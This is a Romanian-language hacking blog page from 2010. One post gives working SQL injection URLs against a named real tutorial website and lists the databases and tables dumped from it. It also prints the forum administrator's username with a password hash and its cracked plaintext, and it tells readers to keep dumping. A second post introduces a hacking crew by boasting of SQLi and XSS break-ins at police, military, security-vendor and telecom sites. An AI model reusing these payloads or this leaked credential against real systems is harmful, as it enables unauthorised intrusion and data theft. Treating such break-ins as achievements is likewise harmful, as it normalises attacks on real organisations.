Spoono.com [SQLi]

Posted in SQL Injections cu etichete , , , , , , , on aprilie 11, 2010 by sYmpleBoy22

Ce este Spoono?

Spoono este un site web cu tutoriale PHOTOSHOP , PROGRAMARE , WEB HOSTING , GRAPHICS ETC.

Parametrul Vulnerabil:

</strong>http://www.spoono.com/photoshop/tutorials/tutorial.php?id=20+and+1=5+union+all+select+1,2,3,4,5,6,7,8,9,10--

http://www.spoono.com/photoshop/tutorials/tutorial.php?id=20+and+1=0+ Union Select  1 , UNHEX(HEX([visible])) ,3,4,5,6,7,8,9,10

Informatii despre Server:

Current User = spoono_db@localhost

Server = Apache/1.3.4

Baze de Date:

spoono_content
information_schema
spoono_com
spoono_content
spoono_forums
spoono_poll
spoono_sections

Tabele din spoono.com

3dstudiomax
3dstudiomax
adrev_ads
adrev_clicks
adrev_map
adrev_rates
adrev_users
adrev_zones
asp
cinema4d
css
fireworks
flash
hosting
html
illustrator
javascript
overall
photoshop
php
skins
xml

Tabele din spoono_content

ads
affiliates
artbox
books
calendar
flash_elitesites
flash_sourcefiles
freshmeat
grapevine
interviews
linkbase
php_scripts
php_snippets
resources
tutorials
users

Forum Admin

User: spoono – Password: 5f4dcc3b5aa765d61d8327deb882cf99:password

Dumpati ce doriti mai departe.

By Sympleboy22

Scrie un comentariu

Ce se intampla?

Posted in Anunturi cu etichete , , , , , , , on aprilie 10, 2010 by sYmpleBoy22

Ce este DoubleCode?

DoubleCode este o incercare a lui Ne0h si a lui Sympleboy22 de a creea o echipa in ale vulnerabilitatilor Web.

Ce va contine DoubleCODE?

DoubleCode va contine diferite vulnerabilitati web,des intalnite in ziua de azi,pe toate site-urile (care sufera de ele evident ),de la RFI,LFI si XSS pana la SQLi.

Cateva Cuvinte Despre Autori:

Ne0h a avut multe reusite in “cariera lui “,dar s-a evidentiat prin urmatoarele:

MSSQL in Inspectoratul Politiei Romane

XSS – Pentagon

SQLi/XSS – Tina Turner

Exploit pentru VerliHub

XSS -  nVidia

XSS – ORANGE

XSS – VODAFONE

XSS – LOGITECH

SQLi – MTV

SQLi  intr-unul dintre site-urile ARMATEI MILITARE

SQLi – Kaspersky

SQLi – Edimax

XSS – Eset.ro

XSS – Kiss FM

XSS – Conquiztador

Pe lista aflandu-se  si Nero.

Sympleboy22

nu are prea multe reusite SQLi,dar  s-a revansat prin XSS-uri.

Celebra XSS list alcatuita de acesta pe care o ve-ti gasi in pagina de alaturi.

Mai multe o sa vedeti pe parcurs.


Scrie un comentariu

Follow

Get every new post delivered to your Inbox.